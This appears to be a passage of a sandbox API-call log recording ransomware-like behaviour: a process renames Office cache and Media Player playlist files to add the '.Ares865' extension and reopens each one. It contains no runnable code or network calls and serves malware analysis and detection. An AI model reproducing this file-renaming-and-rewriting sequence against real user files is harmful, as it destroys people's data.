CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131072) returned 1 [0099.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.Ares865") returned 103 [0099.318] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf.ares865"), dwFlags=0x1) returned 1 [0099.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=114) returned 1 [0099.324] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player" [0099.324] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Transcoded Files Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Transcoded Files Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Transcoded Files Cache" [0099.325] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" [0099.325] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0099.325] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0099.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.Ares865") returned 140 [0099.326] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1044) returned 1 [0099.331] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.Ares865") returned 142 [0099.331] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0099.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.333] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1279) returned 1 [0099.336] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.Ares865") returned 140 [0099.336] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.338] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1267) returned 1 [0099.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.Ares865") returned 143 [0099.342] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0099.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.343] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1284) returned 1 [0099.346] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.Ares865") returned 145 [0099.346] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0099.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.348] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=797) returned 1 [0099.362] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.Ares865") returned 140 [0099.362] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.363] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=785) returned 1 [0099.368] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.Ares865") returned 141 [0099.368] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.ares865"), dwFlags=0x1) returned 1 [0099.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.370] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0099.374] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.Ares865") returned 140 [0099.374] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.376] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1020) returned 1 [0099.378] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.Ares865") returned 134 [0099.378] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.ares865"), dwFlags=0x1) returned 1 [0099.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1025) returned 1 [0099.382] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.Ares865") returned 122 [0099.382] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.ares865"), dwFlags=0x1) returned 1 [0099.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.384] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1063) returned 1 [0099.387] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.Ares865") returned 125 [0099.387] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.ares865"), dwFlags=0x1) returned 1 [0099.388] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.389] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=585) returned 1 [0099.394] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.Ares865") returned 122 [0099.394] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.ares865"), dwFlags=0x1) returned 1 [0099.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.395] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1079) returned 1 [0099.399] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713" [0099.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.Ares865") returned 140 [0099.400] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.402] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1044) returned 1 [0099.404] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.Ares865") returned 142 [0099.404] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0099.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync 